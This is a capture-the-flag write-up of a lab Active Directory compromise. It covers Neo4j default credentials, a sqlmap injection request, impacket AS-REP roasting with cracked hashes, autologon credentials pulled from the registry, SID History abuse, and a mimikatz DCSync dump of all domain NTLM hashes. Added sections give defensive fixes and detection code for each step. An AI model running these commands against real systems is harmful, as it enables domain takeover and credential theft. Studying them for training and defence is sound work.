Looking for light.

春秋云境——time


0x01 Information Gathering


Information gathering, as always, comes first. Run fscan and Tscanplus against the target and see what turns up.

PS S:\tools\渗透\信息收集> .\fscan.exe -h 39.99.155.162
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-28 12:58:13] [INFO] 暴力破解线程数: 1
[2025-03-28 12:58:13] [INFO] 开始信息扫描
[2025-03-28 12:58:13] [INFO] 最终有效主机数量: 1
[2025-03-28 12:58:13] [INFO] 开始主机扫描
[2025-03-28 12:58:14] [INFO] 有效端口数量: 233
[2025-03-28 12:58:14] [SUCCESS] 端口开放 39.99.155.162:110
[2025-03-28 12:58:14] [SUCCESS] 端口开放 39.99.155.162:22
[2025-03-28 12:58:14] [SUCCESS] 服务识别 39.99.155.162:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-28 12:58:16] [SUCCESS] 端口开放 39.99.155.162:7687
[2025-03-28 12:58:16] [SUCCESS] 服务识别 39.99.155.162:110 =>
[2025-03-28 12:58:26] [SUCCESS] 服务识别 39.99.155.162:7687 =>
[2025-03-28 12:58:26] [INFO] 存活端口数量: 3
[2025-03-28 12:58:26] [INFO] 开始漏洞扫描
[2025-03-28 12:58:26] [INFO] 加载的插件: neo4j, pop3, ssh, webpoc, webtitle
[2025-03-28 12:58:27] [SUCCESS] 网站标题 https://39.99.155.162:7687 状态码:400 长度:50     标题:无标题

The scan reveals the telltale Neo4j service, so we look up a CVE for it and give it a try.


0x02 CVE-2021-34371

First, open the Neo4j web interface on port 7474. The default credentials neo4j/neo4j log us straight in. Browsing the console shows the version is 3.4.18, so we try the exploit.


Using a command like the one shown, we send a reverse shell back to our VPS and drop an MSF implant. With persistence in place, we go on to look around inside the box. Note that the reverse-shell command has to follow a specific format; the reason is still unclear.


0x03 Internal Network Reconnaissance


There is no privilege-escalation step on this box, but the flag hints that we should pay attention to the Kerberos authentication flow.

neo4j@ubuntu:~$ cat flag01.txt
cat flag01.txt
 ██████████ ██
░░░░░██░░░ ░░
    ░██     ██ ██████████   █████
    ░██    ░██░░██░░██░░██ ██░░░██
    ░██    ░██ ░██ ░██ ░██░███████
    ░██    ░██ ░██ ░██ ░██░██░░░░
    ░██    ░██ ███ ░██ ░██░░██████
    ░░     ░░ ░░░  ░░  ░░  ░░░░░░


flag01: flag{22910265-6373-4516-92e6-8e540512a961}

Do you know the authentication process of Kerberos?
......This will be the key to your progress.

This smells like Kerberoasting or AS-REP Roasting. The former needs a low-privilege domain account, though, and the latter needs a large list of usernames. With no leads, we set up an frp proxy first and scan the internal network. C2 frameworks usually ship their own proxy module, but I strongly advise against using it; the built-in proxies are painfully slow.

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.36     is alive
(icmp) Target 172.22.6.12     is alive
(icmp) Target 172.22.6.25     is alive
(icmp) Target 172.22.6.38     is alive
[*] Icmp alive hosts len is: 4
172.22.6.36:7687 open
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.25:139 open
172.22.6.12:88 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] NetInfo
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] OsInfo 172.22.6.12  (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.6.25     XIAORANG\WIN2019
[*] NetBios 172.22.6.12     [+] DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.6.38        code:200 len:1531   title:后台登录
[*] WebTitle https://172.22.6.36:7687  code:400 len:50     title:None
已完成 11/11
[*] 扫描结束,耗时: 12.786706188s

Host .38 runs a web service, so let's see what it is. It serves a very typical login page, the kind that makes it hard to resist trying SQL injection. Running sqlmap against it succeeds instantly, which makes things easy. The raw request used for the injection is shown below.


POST /index.php HTTP/1.1
Host: 172.22.6.38
Content-Length: 30
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/index.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

username=admin*&password=123456*
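
The login form above falls to sqlmap because the two POST fields are spliced into the query text. The following is an added example, not code from the write-up or from the target, showing that bug beside the parameterised form that fixes it. It uses sqlite3 as an offline stand-in for the MySQL database; the oa_users column names and the rows are assumptions.

```python
import sqlite3

# Constructed stand-in for the oa_db.oa_users table dumped by sqlmap: sqlite3
# is used so the example runs offline; the column names are assumed, and the
# rows are made up (not the write-up's users).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE oa_users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO oa_users VALUES (?, ?)",
                    [("alice", "correct-horse"), ("bob", "battery-staple")])
    return con

def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    # The request body fields become part of the SQL text, which is the shape
    # of bug sqlmap found on the .38 login form.
    sql = (f"SELECT COUNT(*) FROM oa_users "
           f"WHERE username='{username}' AND password='{password}'")
    return con.execute(sql).fetchone()[0] > 0

def login_parameterised(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders keep the input as data: the driver never lets it alter the
    # statement, so quotes and comment markers in the input are inert.
    sql = "SELECT COUNT(*) FROM oa_users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0

def compare(username: str, password: str) -> dict:
    """Run the same credentials through both versions and report each verdict."""
    con = make_db()
    return {"vulnerable": login_vulnerable(con, username, password),
            "parameterised": login_parameterised(con, username, password)}

if __name__ == "__main__":
    print("valid login:   ", compare("alice", "correct-horse"))
    # The textbook boolean payload in the username field; the password is junk.
    print("injected login:", compare("' OR 1=1 -- ", "anything"))
```

The vulnerable version accepts the injected username with any password because the comment marker discards the password clause; the parameterised version treats the whole string as a literal username and rejects it. A real fix also hashes the stored passwords, which the example leaves out to keep the comparison focused on the query.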

The MySQL database structure dumped through the injection is shown below. After grabbing the flag, we pull out both the admin table and the users table for a closer look.

[13:24:46] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] oa_db
[*] performance_schema
[*] sys
[13:25:09] [INFO] fetching tables for database: 'oa_db'
[3 tables]
+------------+
| oa_admin   |
| oa_f1Agggg |
| oa_users   |
+------------+

The admin table has only one row, and the box is unlikely to be careless enough to hand over the domain Administrator's credentials there, so instead we pull every username out of the users table and try AS-REP Roasting. Small tip: select a column in the CSV file and press Ctrl+C to copy that column by itself. With the list prepared, we use the impacket suite to perform AS-REP Roasting.

┌──(root㉿kali)-[/home/kali]
└─# proxychains4 -q impacket-GetNPUsers xiaorang.lab/ -usersfile oa_users.txt -dc-ip 172.22.6.12
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$wenshao@XIAORANG.LAB:e48a29665bde5f25af6841d8b8bf0894$6fa941d0e520d22fe9d0ee8c67875bd3df0dc8cb9f2b0cf47c0de492190b2fbdde54c56023947e327751d5d51569b65f6c513b70c9b5bb941e18ef2463e940e31d5934235e946d3a3384e3c33cdbac27c04a17e7bdbeb05ce523c802ac11721b885897bb38c56edcbc91bcecd65d5ce610bdfde3a0d41f17ed1ff6ce61c5eef2a7e8a1b4fc1c251e1fc66d99d5f7417f57eca494e76e0b9dc727da093976cf0e57da00bea696aa8b274a6a6a526adc3eca6a84b60de5bb78d26059ce2267a7b1b4b33a3d028b6c47434afd2b9dc2a4b16b09ec993be969c6e4ced51086df0c1d03606d2d4699ebb5c954d7d5
$krb5asrep$23$zhangxin@XIAORANG.LAB:fcedfadbb2afa58cb25c095418d4b8b6$9d19a87a0e21d624dc0c64adeee62cacef8653c678715430d4430b04832effc458369bd3020e14d121a6887fe31a58395f2bd7fc1884afb143eaa6bbe31338cd5bb4ade8f9f3bdb0e313129f78464d8296edda03163b4042494fabb299607b4386ad657c275683966af645019aa7ec0e5bd0d9189f349ebec630f0e1d0c2f907455a771b3fd8726adf8d132600e23372f93c16a4eb8f21ae4442c6c2036f2eaa059d4313e65b9f1c77a8de6ee47c4282b4b168b4c71d02823682ae92769515122ec61e2b91443583165a8c21f4fe7d45f7463945141c4cf66314bf9e7a6e563760b93e81c04dea8e59a0b7c0

With the hashes in hand, crack them with the matching hashcat mode, Kerberos 5, etype 23, AS-REP, which is mode 18200.

$krb5asrep$23$wenshao@XIAORANG.LAB:e48a29665bde5f25af6841d8b8bf0894$6fa941d0e520d22fe9d0ee8c67875bd3df0dc8cb9f2b0cf47c0de492190b2fbdde54c56023947e327751d5d51569b65f6c513b70c9b5bb941e18ef2463e940e31d5934235e946d3a3384e3c33cdbac27c04a17e7bdbeb05ce523c802ac11721b885897bb38c56edcbc91bcecd65d5ce610bdfde3a0d41f17ed1ff6ce61c5eef2a7e8a1b4fc1c251e1fc66d99d5f7417f57eca494e76e0b9dc727da093976cf0e57da00bea696aa8b274a6a6a526adc3eca6a84b60de5bb78d26059ce2267a7b1b4b33a3d028b6c47434afd2b9dc2a4b16b09ec993be969c6e4ced51086df0c1d03606d2d4699ebb5c954d7d5:hellokitty

$krb5asrep$23$zhangxin@XIAORANG.LAB:fcedfadbb2afa58cb25c095418d4b8b6$9d19a87a0e21d624dc0c64adeee62cacef8653c678715430d4430b04832effc458369bd3020e14d121a6887fe31a58395f2bd7fc1884afb143eaa6bbe31338cd5bb4ade8f9f3bdb0e313129f78464d8296edda03163b4042494fabb299607b4386ad657c275683966af645019aa7ec0e5bd0d9189f349ebec630f0e1d0c2f907455a771b3fd8726adf8d132600e23372f93c16a4eb8f21ae4442c6c2036f2eaa059d4313e65b9f1c77a8de6ee47c4282b4b168b4c71d02823682ae92769515122ec61e2b91443583165a8c21f4fe7d45f7463945141c4cf66314bf9e7a6e563760b93e81c04dea8e59a0b7c0:strawberry
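
From the defender's side, the GetNPUsers run above leaves a clear trace on the domain controller: Security event 4768 (a TGT was requested) with Pre-Authentication Type 0 and Ticket Encryption Type 0x17 (RC4, the etype 23 in the $krb5asrep$23$ lines). The following is an added detection example, not part of the write-up; the event lines are constructed (flattened to key=value pairs), reusing the write-up's account names and the pivot host 172.22.6.36 as the request source, and "nonuser" is made up.

```python
import re

# Constructed Security-log lines, one 4768 event per line, flattened to
# key=value pairs with the field names the 4768 event uses.
SAMPLE_4768 = """\
TargetUserName=yuxuan PreAuthType=2 TicketEncryptionType=0x12 IpAddress=172.22.6.25 Status=0x0
TargetUserName=wenshao PreAuthType=0 TicketEncryptionType=0x17 IpAddress=172.22.6.36 Status=0x0
TargetUserName=zhangxin PreAuthType=0 TicketEncryptionType=0x17 IpAddress=172.22.6.36 Status=0x0
TargetUserName=nonuser PreAuthType=0 TicketEncryptionType=0x17 IpAddress=172.22.6.36 Status=0x6
TargetUserName=DC-PROGAME$ PreAuthType=2 TicketEncryptionType=0x12 IpAddress=172.22.6.12 Status=0x0
"""

KV_RE = re.compile(r"(\w+)=(\S+)")

def parse_4768(text: str) -> list:
    """One dict per event line."""
    return [dict(KV_RE.findall(line)) for line in text.splitlines() if line.strip()]

def roastable_accounts(events) -> list:
    """Accounts that were issued a TGT with no pre-authentication and an RC4
    (0x17) encrypted part: exactly the material GetNPUsers printed above."""
    return sorted({e["TargetUserName"] for e in events
                   if e.get("PreAuthType") == "0"
                   and e.get("TicketEncryptionType", "").lower() == "0x17"
                   and e.get("Status") == "0x0"})

def spraying_sources(events, threshold: int = 3) -> dict:
    """Source addresses that sent pre-auth-less AS-REQs for many distinct names.
    A usersfile run also yields Status 0x6 (client not found) for names that
    do not exist, so failures count towards the same source."""
    seen = {}
    for e in events:
        if e.get("PreAuthType") == "0":
            seen.setdefault(e.get("IpAddress"), set()).add(e["TargetUserName"])
    return {ip: len(names) for ip, names in seen.items() if len(names) >= threshold}

if __name__ == "__main__":
    events = parse_4768(SAMPLE_4768)
    print("AS-REP roastable accounts:", roastable_accounts(events))
    print("sources enumerating names:", spraying_sources(events))
```

The first check names the accounts that need fixing (enable pre-authentication, or at least move them off RC4 by setting AES-only in msDS-SupportedEncryptionTypes); the second catches the enumeration itself, since one address asking for TGTs without pre-auth for many names, some of which do not exist, is the signature of a usersfile run.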


With credentials in hand, we don't rush straight to RDP; first we try Kerberoasting to see whether we can widen the foothold. impacket reports No entries found, so it's RDP after all. Neither account has a flag, and neither holds any abusable privilege in its privilege groups, so we check this machine's logon information to see who has logged on to it.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
DefaultUserName    REG_SZ    yuxuan
DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
DefaultDomainName    REG_SZ    xiaorang.lab


Querying the registry shows the logon state along with a possible default username, password and domain. That gives us yuxuan's credentials, our third set of plaintext credentials. We bring up a session as this user, then run BloodHound to map the domain structure and plan the next move.


0x04 Lateral Movement in the Domain


Analyse the domain structure with BloodHound.


Something suspicious turns up: the yuxuan user carries the SID of the domain's Administrators group in its SID History. A quick look at what SID History does: SID History is an attribute used during domain migration. When a domain user is migrated from domain A to domain B, the user's SID changes in domain B, which affects the user's permissions after migration and means the migrated user can no longer access resources it could reach before. SID History exists to preserve a domain user's access rights during migration: if the user's SID changes after migration, the system adds the original SID to the migrated user's SID History attribute, so the migrated user retains the original permissions and can still access the resources it could reach before.
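
The property that makes SID History useful for migration is what makes it dangerous when tampered with: whatever is in sIDHistory is added to the user's token. The following is an added audit example, not part of the write-up, that checks each account's sIDHistory for two things: well-known privileged SIDs, and entries from the current domain itself (a legitimate migration only ever adds SIDs from the old domain). The domain SID and the account list are constructed; the example assumes the write-up's finding refers to the built-in Administrators SID S-1-5-32-544.

```python
# Constructed domain SID and sIDHistory values, in the form BloodHound or an
# LDAP query for the sIDHistory attribute would return them.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"

ACCOUNTS = {
    "yuxuan":   ["S-1-5-32-544"],                      # mirrors the write-up's finding
    "wenshao":  [],
    "zhangxin": [DOMAIN_SID + "-1105"],                 # history from the same domain
    "migrated": ["S-1-5-21-9999999999-8888888888-7777777777-1234"],  # plausible migration
}

# Well-known privileged principals: built-in groups by full SID, domain
# principals by RID (the domain part varies).
BUILTIN_PRIVILEGED = {"S-1-5-32-544": "BUILTIN\\Administrators"}
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins",
                   518: "Schema Admins", 519: "Enterprise Admins"}

def audit_sid_history(accounts: dict, domain_sid: str) -> list:
    """Return (account, sid, reason) for every suspicious sIDHistory entry."""
    findings = []
    for user, history in accounts.items():
        for sid in history:
            if sid in BUILTIN_PRIVILEGED:
                findings.append((user, sid, "privileged: " + BUILTIN_PRIVILEGED[sid]))
                continue
            domain_part, _, rid = sid.rpartition("-")
            if int(rid) in PRIVILEGED_RIDS:
                findings.append((user, sid, "privileged: " + PRIVILEGED_RIDS[int(rid)]))
            if domain_part == domain_sid:
                findings.append((user, sid, "same-domain SID in history"))
    return findings

if __name__ == "__main__":
    for user, sid, reason in audit_sid_history(ACCOUNTS, DOMAIN_SID):
        print(f"{user}: {sid} ({reason})")
```

Either finding warrants clearing the attribute and investigating how it got there; the "migrated" account is left alone because its history SID belongs to a different domain and is not a privileged principal.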

So in effect the yuxuan user is a member of the domain Administrators group. Run DCSync with mimikatz, obtain the Administrator's NTLM hash, and we're done.

Using 'C:\Users\Public\1.txt' for logfile : OK

mimikatz # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC-PROGAME.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1103	shuzhen	07c1f387d7c2cf37e0ca7827393d2327	512
1104	gaiyong	52c909941c823dbe0f635b3711234d2e	512
1106	xiqidi	a55d27cfa25f3df92ad558c304292f2e	512
1107	wengbang	6b1d97a5a68c6c6c9233d11274d13a2e	512
1108	xuanjiang	a72a28c1a29ddf6509b8eabc61117c6c	512
1109	yuanchang	e1cea038f5c9ffd9dc323daf35f6843b	512
1110	lvhui	f58b31ef5da3fc831b4060552285ca54	512
1111	wenbo	9abb7115997ea03785e92542f684bdde	512
1112	zhenjun	94c84ba39c3ece24b419ab39fdd3de1a	512
1113	jinqing	4bf6ad7a2e9580bc8f19323f96749b3a	512
1115	yangju	1fa8c6b4307149415f5a1baffebe61cf	512
1117	weicheng	796a774eace67c159a65d6b86fea1d01	512
1118	weixian	8bd7dc83d84b3128bfbaf165bf292990	512
1119	haobei	045cc095cc91ba703c46aa9f9ce93df1	512
1120	jizhen	1840c5130e290816b55b4e5b60df10da	512
1121	jingze	3c8acaecc72f63a4be945ec6f4d6eeee	512
1122	rubao	d8bd6484a344214d7e0cfee0fa76df74	512
1123	zhaoxiu	694c5c0ec86269daefff4dd611305fab	512
1124	tangshun	90b8d8b2146db6456d92a4a133eae225	512
1125	liangliang	c67cd4bae75b82738e155df9dedab7c1	512
1126	qiyue	b723d29e23f00c42d97dd97cc6b04bc8	512
1127	chouqian	c6f0585b35de1862f324bc33c920328d	512
1128	jicheng	159ee55f1626f393de119946663a633c	512
1129	xiyi	ee146df96b366efaeb5138832a75603b	512
1130	beijin	a587b90ce9b675c9acf28826106d1d1d	512
1131	chenghui	08224236f9ddd68a51a794482b0e58b5	512
1132	chebin	b50adfe07d0cef27ddabd4276b3c3168	512
1133	pengyuan	a35d8f3c986ab37496896cbaa6cdfe3e	512
1134	yanglang	91c5550806405ee4d6f4521ba6e38f22	512
1135	jihuan	cbe4d79f6264b71a48946c3fa94443f5	512
1136	duanmuxiao	494cc0e2e20d934647b2395d0a102fb0	512
1137	hongzhi	f815bf5a1a17878b1438773dba555b8b	512
1138	gaijin	b1040198d43631279a63b7fbc4c403af	512
1139	yifu	4836347be16e6af2cd746d3f934bb55a	512
1140	fusong	adca7ec7f6ab1d2c60eb60f7dca81be7	512
1141	luwan	c5b2b25ab76401f554f7e1e98d277a6a	512
1142	tangrong	2a38158c55abe6f6fe4b447fbc1a3e74	512
1143	zhufeng	71e03af8648921a3487a56e4bb8b5f53	512
1145	dongcheng	f2fdf39c9ff94e24cf185a00bf0a186d	512
1146	lianhuangchen	23dc8b3e465c94577aa8a11a83c001af	512
1147	lili	b290a36500f7e39beee8a29851a9f8d5	512
1148	huabi	02fe5838de111f9920e5e3bb7e009f2f	512
1149	rangsibo	103d0f70dc056939e431f9d2f604683c	512
1150	wohua	cfcc49ec89dd76ba87019ca26e5f7a50	512
1151	haoguang	33efa30e6b3261d30a71ce397c779fda	512
1152	langying	52a8a125cd369ab16a385f3fcadc757d	512
1153	diaocai	a14954d5307d74cd75089514ccca097a	512
1154	lianggui	4ae2996c7c15449689280dfaec6f2c37	512
1155	manxue	0255c42d9f960475f5ad03e0fee88589	512
1156	baqin	327f2a711e582db21d9dd6d08f7bdf91	512
1157	chengqiu	0d0c1421edf07323c1eb4f5665b5cb6d	512
1158	louyou	a97ba112b411a3bfe140c941528a4648	512
1159	maqun	485c35105375e0754a852cee996ed33b	512
1160	wenbiao	36b6c466ea34b2c70500e0bfb98e68bc	512
1161	weishengshan	f60a4233d03a2b03a7f0ae619c732fae	512
1163	chuyuan	0cfdca5c210c918b11e96661de82948a	512
1164	wenliang	a4d2bacaf220292d5fdf9e89b3513a5c	512
1165	yulvxue	cf970dea0689db62a43b272e2c99dccd	512
1166	luyue	274d823e941fc51f84ea323e22d5a8c4	512
1167	ganjian	7d3c39d94a272c6e1e2ffca927925ecc	512
1168	pangzhen	51d37e14983a43a6a45add0ae8939609	512
1169	guohong	d3ce91810c1f004c782fe77c90f9deb6	512
1170	lezhong	dad3990f640ccec92cf99f3b7be092c7	512
1171	sheweiyue	d17aecec7aa3a6f4a1e8d8b7c2163b35	512
1172	dujian	8f7846c78f03bf55685a697fe20b0857	512
1173	lidongjin	34638b8589d235dea49e2153ae89f2a1	512
1174	hongqun	6c791ef38d72505baeb4a391de05b6e1	512
1175	yexing	34842d36248c2492a5c9a1ae5d850d54	512
1176	maoda	6e65c0796f05c0118fbaa8d9f1309026	512
1177	qiaomei	6a889f350a0ebc15cf9306687da3fd34	512
502	krbtgt	a4206b127773884e2c7ea86cdd282d9c	514
500	Administrator	04d93ffd6f5f6e4490e0de23f240a5e9	512
1000	DC-PROGAME$	685aca112c0f5f29984f5b212c648d47	532480
1181	WIN2019$	acd83f0837bc0b4eebe2a28437e38d23	4096
1178	wenshao	b31c6aa5660d6e87ee046b1bb5d0ff79	4260352
1179	zhangxin	d6c5976e07cdb410be19b84126367e3d	4260352
1180	yuxuan	376ece347142d1628632d440530e8eed	66048
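
The last column of the CSV dump above is userAccountControl, and it explains the earlier AS-REP Roasting result: 4260352 is 0x410200, which includes DONT_REQ_PREAUTH (0x400000), and wenshao and zhangxin are exactly the two accounts GetNPUsers returned. The following is an added example, not part of the write-up, that decodes that column; the flag values are the documented userAccountControl bits, and the rows are copied from the dump with the hashes omitted.

```python
# Documented userAccountControl bits that appear in the dump above.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}

# Subset of the DCSync CSV above: RID, sAMAccountName, userAccountControl
# (hash column dropped).
DUMP = """\
1103\tshuzhen\t512
502\tkrbtgt\t514
500\tAdministrator\t512
1000\tDC-PROGAME$\t532480
1181\tWIN2019$\t4096
1178\twenshao\t4260352
1179\tzhangxin\t4260352
1180\tyuxuan\t66048
"""

def decode_uac(value: int) -> list:
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def parse_dump(text: str) -> list:
    """(rid, name, uac) tuples from the tab-separated rows."""
    rows = []
    for line in text.splitlines():
        rid, name, uac = line.split("\t")
        rows.append((int(rid), name, int(uac)))
    return rows

def preauth_disabled(rows) -> list:
    """Accounts whose Kerberos pre-authentication is turned off."""
    return [name for _, name, uac in rows if uac & 0x400000]

def password_never_expires(rows) -> list:
    return [name for _, name, uac in rows if uac & 0x10000]

if __name__ == "__main__":
    rows = parse_dump(DUMP)
    for rid, name, uac in rows:
        print(f"{rid:>5} {name:<14} {uac:>8} (0x{uac:x}) {', '.join(decode_uac(uac))}")
    print("pre-auth disabled:", preauth_disabled(rows))
    print("password never expires:", password_never_expires(rows))
```

The same decode shows the rest of the column at a glance: 514 on krbtgt is a disabled normal account, 532480 on DC-PROGAME$ is a server trust account trusted for delegation, and 66048 on yuxuan means a normal account whose password never expires.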

With 500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9 obtained, this box is finished.


0x05 Summary

A fairly standard Windows domain box; checking the default logon credentials in the registry was a genuinely new idea. It exercises the most common domain techniques, with no real difficulty or cleverness, purely a matter of practice.